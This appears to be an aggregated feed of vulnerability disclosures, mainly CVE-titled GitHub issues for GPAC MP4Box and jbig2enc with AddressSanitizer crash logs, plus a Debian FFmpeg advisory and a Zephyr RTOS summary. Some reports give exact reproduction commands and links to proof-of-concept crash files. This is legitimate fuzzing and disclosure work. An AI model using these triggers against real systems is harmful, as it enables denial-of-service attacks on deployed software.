        #12 0x55ff5356ddd4 in _start (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x82dd4) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
    
    0x60b000001d88 is located 104 bytes inside of 112-byte region [0x60b000001d20,0x60b000001d90)
    freed by thread T0 here:
        #0 0x55ff535f0972 in free (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x105972) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
        #1 0x7f57c001e6f5 in gf_isom_box_del /home/user/fuzzing_gpac/gpac/src/isomedia/box_funcs.c:2005:3
    
    previously allocated by thread T0 here:
        #0 0x55ff535f0c1e in malloc (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x105c1e) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
        #1 0x7f57bff95c5a in trun_box_new /home/user/fuzzing_gpac/gpac/src/isomedia/box_code_base.c:7805:2
        #2 0x7f57c0026335 in gf_isom_box_new /home/user/fuzzing_gpac/gpac/src/isomedia/box_funcs.c:1896:9
        #3 0x7f57c0026335 in gf_isom_box_new_parent /home/user/fuzzing_gpac/gpac/src/isomedia/box_funcs.c:2351:14
        #4 0x7f57c0d06f05 in mp4_mux_process_sample /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:4915:9
        #5 0x7f57c0cf85a4 in mp4_mux_process_fragmented /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:6653:8
        #6 0x7f57c0cf46f3 in mp4_mux_process /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:7273:14
        #7 0x7f57c09afa33 in gf_filter_process_task /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:2971:7
    
    SUMMARY: AddressSanitizer: heap-use-after-free /home/user/fuzzing_gpac/gpac/src/isomedia/movie_fragments.c:936:37 in flush_ref_samples
    Shadow bytes around the buggy address:
      0x0c167fff8360: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c167fff8370: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c167fff8380: 00 00 00 00 05 fa fa fa fa fa fa fa fa fa 00 00
      0x0c167fff8390: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
      0x0c167fff83a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
    =>0x0c167fff83b0: fd[fd]fa fa fa fa fa fa fa fa fd fd fd fd fd fd
      0x0c167fff83c0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
      0x0c167fff83d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
      0x0c167fff83e0: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd
      0x0c167fff83f0: fd fd fd fd fa fa fa fa fa fa fa fa fd fd fd fd
      0x0c167fff8400: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==836900==ABORTING
    

**Reproduce****POC File**

https://github.com/gandalf4a/crash\_report/blob/main/gpac/MP4Box/huaf\_936

**Credit**

1 participant

CVE-2023-48011: heap-use-after-free in ./gpac/src/isomedia/movie_fragments.c:936:37 in flush_ref_samples · Issue #2611 · gpac/gpac

MP4Box GPAC v2.3-DEV-rev617-g671976fcc-master was discovered to contain a memory leak in the function gf_isom_add_chapter at /isomedia/isom_write.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted MP4 file.

1、Version  
./MP4Box -version  
MP4Box - GPAC version 2.3-DEV-rev617-g671976fcc-master  
(c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io

Please cite our work in your research:  
GPAC Filters: https://doi.org/10.1145/3339825.3394929  
GPAC: https://doi.org/10.1145/1291233.1291452

GPAC Configuration:  
Features: GPAC\_CONFIG\_LINUX GPAC\_64\_BITS GPAC\_HAS\_IPV6 GPAC\_HAS\_SSL GPAC\_HAS\_SOCK\_UN GPAC\_MINIMAL\_ODF GPAC\_HAS\_QJS GPAC\_HAS\_JPEG GPAC\_HAS\_PNG GPAC\_HAS\_LINUX\_DVB GPAC\_DISABLE\_3D

**2、ASAN Log  
\[Dasher\] No template assigned, using $File$\_dash$FS$$Number$  
\[IsoMedia\] Failed to fetch initial sample 1 for track 1  
\[IsoMedia\] Failed to fetch initial sample 1 for track 1  
AddressSanitizer:DEADLYSIGNAL**

\==3416==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7f340d3b22bc bp 0x7fff33ecd7f0 sp 0x7fff33eccf78 T0)  
\==3416==The signal is caused by a READ memory access.  
\==3416==Hint: this fault was caused by a dereference of a high value address (see register values below). Dissassemble the provided pc to learn which register was used.  
#0 0x7f340d3b22bc (/lib/x86\_64-linux-gnu/libc.so.6+0x1b22bc)  
#1 0x7f340f85b8ce in \_\_interceptor\_strdup ../../../../src/libsanitizer/asan/asan\_interceptors.cpp:450  
#2 0x7f340e473095 in gf\_isom\_add\_chapter isomedia/isom\_write.c:3182  
#3 0x7f340ee901db in mp4\_mux\_setup\_pid filters/mux\_isom.c:3763  
#4 0x7f340eb04d02 in gf\_filter\_pid\_configure filter\_core/filter\_pid.c:876  
#5 0x7f340eb09a3c in gf\_filter\_pid\_connect\_task filter\_core/filter\_pid.c:1230  
#6 0x7f340eb4642f in gf\_fs\_thread\_proc filter\_core/filter\_session.c:2105  
#7 0x7f340eb4d74e in gf\_fs\_run filter\_core/filter\_session.c:2405  
#8 0x7f340e5b8626 in gf\_dasher\_process media\_tools/dash\_segmenter.c:1236  
#9 0x560c71d604d9 in do\_dash /home/returnzero/gpac/applications/mp4box/mp4box.c:4831  
#10 0x560c71d604d9 in mp4box\_main /home/returnzero/gpac/applications/mp4box/mp4box.c:6245  
#11 0x7f340d229d8f in \_\_libc\_start\_call\_main ../sysdeps/nptl/libc\_start\_call\_main.h:58  
#12 0x7f340d229e3f in \_\_libc\_start\_main\_impl ../csu/libc-start.c:392  
#13 0x560c71cf6214 in \_start (/home/returnzero/gpac/bin/gcc/MP4Box+0x4e214)

AddressSanitizer can not provide additional info.  
SUMMARY: AddressSanitizer: SEGV (/lib/x86\_64-linux-gnu/libc.so.6+0x1b22bc)  
\==3416==ABORTING

3、Reproduction  
./MP4Box -dash 10000 $poc

4、poc  
crash65.zip

5、Impact  
This vulnerability is capable of causing crashes, or lead to dos.

6、 Env  
Linux returnzero-virtual-machine 6.2.0-36-generic #37~22.04.1-Ubuntu SMP PREEMPT\_DYNAMIC Mon Oct 9 15:34:04 UTC 2 x86\_64 x86\_64 x86\_64 GNU/Linux  
AFL++ 4.09a

7、Credit  
ReturnZero

CVE-2023-47384: Memory Leak in  gf_isom_add_chapter isomedia/isom_write.c:3182 · Issue #2672 · gpac/gpac

Debian Linux Security Advisory 5552-1 - Several vulnerabilities have been discovered in the FFmpeg multimedia framework, which could result in denial of service or potentially the execution of arbitrary code if malformed files/streams are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5552-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 12, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ffmpegCVE ID         : CVE-2022-4907Several vulnerabilities have been discovered in the FFmpeg multimediaframework, which could result in denial of service or potentially theexecution of arbitrary code if malformed files/streams are processed.For the stable distribution (bookworm), this problem has been fixed inversion 7:5.1.4-0+deb12u1.We recommend that you upgrade your ffmpeg packages.For the detailed security status of ffmpeg please refer toits security tracker page at:https://security-tracker.debian.org/tracker/ffmpegFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVRHAcACgkQEMKTtsN8TjarbhAArIXbV7G++JFpuwnvfFkrmTxT9W9k7puRlFLmnErCKQ4S2GHAd4FmOuTyUDdqIMYtqpRDV30VIQu+TXSmt95Fbms7WStzbcN37s2nELdKWObMYMg60LhscujiJZOJvZGtd4m+btn0Oj71ajcumwOBiqGu8mNI8HBa2gMWQ8z1aol9TzfmcuKE0am4OmheqN3I76wXncSWj8lFqJujD7YESx8liLCBNJ3Lt7lsG9B7Dv9iDcyhADMjX8V5A84OP1eKVEfiTxfHGN+ibFQp3gnopCqTIWf4VXmi+UMBJqvaNyOuKG50pl2qh1dlXq1CIc7mHqrZbMWi7phvunozyOj+o5uzBCtdqZ/jEr5htqGNyXONqzSZUmm+n39mZ5IxZG1DVJ9eZiJNwCBqJ1xOvWYGnT2YOVOIWUhCi3jUIlq809mgZ2bVslN6XqMh8TAEKZ03fuDIlutCHX39fs7hKg0f6GEFQAoN1Kp8G82WSa/qEhJC/3yQcAn3x3dPIPzickWnizYyDXgbO15DnfbG2hPioxI8taXPRBibSkGssXYDyiuHQ4T0x+L39svl5cXdISCpjO/D3U5EsO1M3/4j02lOfEaOlgNCySF/oWWXhXFqybtAcArYVPN8fxfOaWPx96f+VwN4aFl+WlOLP+u2rY9VxLUVWh1lElr8h7cC2wgwClU==V1mm-----END PGP SIGNATURE-----

Debian Security Advisory 5552-1

Zephyr RTOS versions 3.5.0 and below suffer from a multitude of buffer overflow vulnerabilities.

Zephyr RTOS 3.x.0 Buffer Overflows

jbig2enc v0.28 was discovered to contain a heap-use-after-free via jbig2enc_auto_threshold_using_hash in src/jbig2enc.cc.

**heap-use-after-free in jbig2enc****Description**

jbig2enc v0.28 was discovered to contain a heap-use-after-free via jbig2enc\_auto\_threshold\_using\_hash in src/jbig2enc.cc. This vulnerability can lead to a Denial of Service (DoS).

**ASAN Log**

./src/jbig2 -s -a -p Poc1jbig2enc

\=================================================================
==1464517==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000015470 at pc 0x555555560b51 bp 0x7fffffffdf70 sp 0x7fffffffdf60
READ of size 4 at 0x603000015470 thread T0
    #0 0x555555560b50 in remove\_templates /test2/jbig2enc/src/jbig2enc.cc:248
    #1 0x555555562efd in jbig2enc\_auto\_threshold\_using\_hash(jbig2ctx\*) /test2/jbig2enc/src/jbig2enc.cc:484
    #2 0x55555555f4f1 in main /test2/jbig2enc/src/jbig2.cc:492
    #3 0x7ffff6c1f082 in \_\_libc\_start\_main ../csu/libc-start.c:308
    #4 0x55555555bf4d in \_start (/test2/jbig2enc/src/jbig2+0x7f4d)

0x603000015470 is located 16 bytes inside of 24-byte region \[0x603000015460,0x603000015478)
freed by thread T0 here:
    #0 0x7ffff769251f in operator delete(void\*) ../../../../src/libsanitizer/asan/asan\_new\_delete.cc:165
    #1 0x55555557a4f5 in \_\_gnu\_cxx::new\_allocator<std::\_List\_node<int> >::deallocate(std::\_List\_node<int>\*, unsigned long) (/test2/jbig2enc/src/jbig2+0x264f5)
    #2 0x5555555778f3 in std::allocator\_traits<std::allocator<std::\_List\_node<int> > >::deallocate(std::allocator<std::\_List\_node<int> >&, std::\_List\_node<int>\*, unsigned long) (/test2/jbig2enc/src/jbig2+0x238f3)
    #3 0x555555571fc7 in std::\_\_cxx11::\_List\_base<int, std::allocator<int> >::\_M\_put\_node(std::\_List\_node<int>\*) (/test2/jbig2enc/src/jbig2+0x1dfc7)
    #4 0x55555556e28e in std::\_\_cxx11::list<int, std::allocator<int> >::\_M\_erase(std::\_List\_iterator<int>) (/test2/jbig2enc/src/jbig2+0x1a28e)
    #5 0x55555556c1f4 in std::\_\_cxx11::list<int, std::allocator<int> >::pop\_back() (/test2/jbig2enc/src/jbig2+0x181f4)
    #6 0x555555560ba2 in remove\_templates /test2/jbig2enc/src/jbig2enc.cc:251
    #7 0x555555562efd in jbig2enc\_auto\_threshold\_using\_hash(jbig2ctx\*) /test2/jbig2enc/src/jbig2enc.cc:484
    #8 0x55555555f4f1 in main /test2/jbig2enc/src/jbig2.cc:492
    #9 0x7ffff6c1f082 in \_\_libc\_start\_main ../csu/libc-start.c:308

previously allocated by thread T0 here:
    #0 0x7ffff7691587 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan\_new\_delete.cc:104
    #1 0x55555557b669 in \_\_gnu\_cxx::new\_allocator<std::\_List\_node<int> >::allocate(unsigned long, void const\*) (/test2/jbig2enc/src/jbig2+0x27669)
    #2 0x55555557a524 in std::allocator\_traits<std::allocator<std::\_List\_node<int> > >::allocate(std::allocator<std::\_List\_node<int> >&, unsigned long) (/test2/jbig2enc/src/jbig2+0x26524)
    #3 0x555555577918 in std::\_\_cxx11::\_List\_base<int, std::allocator<int> >::\_M\_get\_node() (/test2/jbig2enc/src/jbig2+0x23918)
    #4 0x55555557236d in std::\_List\_node<int>\* std::\_\_cxx11::list<int, std::allocator<int> >::\_M\_create\_node<int const&>(int const&) (/test2/jbig2enc/src/jbig2+0x1e36d)
    #5 0x55555556e99f in void std::\_\_cxx11::list<int, std::allocator<int> >::\_M\_insert<int const&>(std::\_List\_iterator<int>, int const&) (/test2/jbig2enc/src/jbig2+0x1a99f)
    #6 0x555555577cf2 in void std::\_\_cxx11::list<int, std::allocator<int> >::emplace\_back<int const&>(int const&) (/test2/jbig2enc/src/jbig2+0x23cf2)
    #7 0x5555555728f2 in void std::\_\_cxx11::list<int, std::allocator<int> >::\_M\_initialize\_dispatch<std::\_List\_const\_iterator<int> >(std::\_List\_const\_iterator<int>, std::\_List\_const\_iterator<int>, std::\_\_false\_type) (/test2/jbig2enc/src/jbig2+0x1e8f2)
    #8 0x55555556ebe7 in std::\_\_cxx11::list<int, std::allocator<int> >::list(std::\_\_cxx11::list<int, std::allocator<int> > const&) (/test2/jbig2enc/src/jbig2+0x1abe7)
    #9 0x55555556cbb6 in std::pair<unsigned int, std::\_\_cxx11::list<int, std::allocator<int> > >::pair<int&, std::\_\_cxx11::list<int, std::allocator<int> >&, true>(int&, std::\_\_cxx11::list<int, std::allocator<int> >&) (/test2/jbig2enc/src/jbig2+0x18bb6)
    #10 0x555555562cba in jbig2enc\_auto\_threshold\_using\_hash(jbig2ctx\*) /test2/jbig2enc/src/jbig2enc.cc:471
    #11 0x55555555f4f1 in main /test2/jbig2enc/src/jbig2.cc:492
    #12 0x7ffff6c1f082 in \_\_libc\_start\_main ../csu/libc-start.c:308

SUMMARY: AddressSanitizer: heap-use-after-free /test2/jbig2enc/src/jbig2enc.cc:248 in remove\_templates
Shadow bytes around the buggy address:
  0x0c067fffaa30: fa fa fd fd fd fa fa fa fd fd fd fa fa fa 00 00
  0x0c067fffaa40: 00 fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
  0x0c067fffaa50: fd fd fd fa fa fa 00 00 00 fa fa fa fd fd fd fa
  0x0c067fffaa60: fa fa fd fd fd fa fa fa fd fd fd fa fa fa 00 00
  0x0c067fffaa70: 00 fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
\=>0x0c067fffaa80: fd fd fd fa fa fa fd fd fd fa fa fa fd fd\[fd\]fa
  0x0c067fffaa90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffaaa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffaab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffaac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fffaad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
\==1464517\==ABORTING

**Reproduction**

git clone https://github.com/agl/jbig2enc.git
cd jbig2enc
apt install libleptonica-dev
./autogen.sh
CFLAGS="\-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS=" -fsanitize=address -fno-omit-frame-pointer -g" ./configure --disable-shared
make -j24

./src/jbig2 -s -a -p Poc1jbig2enc

**PoC**

Poc1jbig2enc: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/Poc1jbig2enc

**Version**

root@38ad1e4b9d16:/test2/jbig2enc# ./src/jbig2 --version
jbig2enc 0.28

**Reference**

https://github.com/agl/jbig2enc

**Environment**

    ubuntu:20.04
    gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)
    clang version 10.0.0-4ubuntu1
    afl-cc++4.09
    

**Credit**

Zeng Yunxiang

CVE-2023-46362: heap-use-after-free in jbig2enc via jbig2enc_auto_threshold_using_hash in src/jbig2enc.cc.  · Issue #84 · agl/jbig2enc

Buffer Overflow vulnerability in gpac MP4Box v.2.3-DEV-rev573-g201320819-master allows a local attacker to cause a denial of service via the gpac/src/isomedia/isom_read.c:2807:51 function in gf_isom_get_user_data.

**Version**

    root@4dd48d09e778:~/gpac/bin/gcc# ./MP4Box -version
    MP4Box - GPAC version 2.3-DEV-rev573-g201320819-master
    (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: 
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Platform**

    root@4dd48d09e778:~/gpac/bin/gcc# uname -a
    Linux 4dd48d09e778 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    

**Poc**

    Pocgpac:https://github.com/S0ngJX/Poc/blob/main/Pocgpac
    

**Asan**

    root@4dd48d09e778:~/gpac/bin/gcc# ./MP4Box -dash 1000 -profile live -out session.mpd Pocgpac:@reframer:sap=1 Pocgpac
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==4066570==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7ffff5cc2ed0 bp 0x7ffffffeaf40 sp 0x7ffffffea6d8 T0)
    ==4066570==The signal is caused by a READ memory access.
    ==4066570==Hint: address points to the zero page.
        #0 0x7ffff5cc2ed0  (/lib/x86_64-linux-gnu/libc.so.6+0x184ed0)
        #1 0x441f94 in MemcmpInterceptorCommon(void*, int (*)(void const*, void const*, unsigned long), void const*, void const*, unsigned long) (/root/gpac/bin/gcc/MP4Box+0x441f94)
        #2 0x44236a in bcmp (/root/gpac/bin/gcc/MP4Box+0x44236a)
        #3 0x7ffff681ed6d in gf_isom_get_user_data /root/gpac/src/isomedia/isom_read.c:2807:51
        #4 0x7ffff71e9acb in isor_declare_track /root/gpac/src/filters/isoffin_load.c:696:5
        #5 0x7ffff71fb2f6 in isor_declare_objects /root/gpac/src/filters/isoffin_load.c:1728:3
        #6 0x7ffff72023e7 in isoffin_setup /root/gpac/src/filters/isoffin_read.c:181:6
        #7 0x7ffff71ffb66 in isoffin_configure_pid /root/gpac/src/filters/isoffin_read.c:477:9
        #8 0x7ffff6f1abed in gf_filter_pid_configure /root/gpac/src/filter_core/filter_pid.c:876:6
        #9 0x7ffff6f367b6 in gf_filter_pid_connect_task /root/gpac/src/filter_core/filter_pid.c:1230:3
        #10 0x7ffff6f85478 in gf_fs_thread_proc /root/gpac/src/filter_core/filter_session.c:2105:3
        #11 0x7ffff6f83fed in gf_fs_run /root/gpac/src/filter_core/filter_session.c:2405:3
        #12 0x7ffff69bd98c in gf_dasher_process /root/gpac/src/media_tools/dash_segmenter.c:1236:6
        #13 0x50dfc7 in do_dash /root/gpac/applications/mp4box/mp4box.c:4831:15
        #14 0x50dfc7 in mp4box_main /root/gpac/applications/mp4box/mp4box.c:6245:7
        #15 0x7ffff5b62082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
        #16 0x42adad in _start (/root/gpac/bin/gcc/MP4Box+0x42adad)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x184ed0) 
    ==4066570==ABORTING
    
    
    

**Reproduce**

    ./MP4Box -dash 1000 -profile live -out session.mpd Pocgpac:@reframer:sap=1 Pocgpac
    

**Credit**

    Song Jiaxuan (Huazhong University of Science and Technology)
    Zeng Yunxiang (Huazhong University of Science and Technology)

Tag

#c++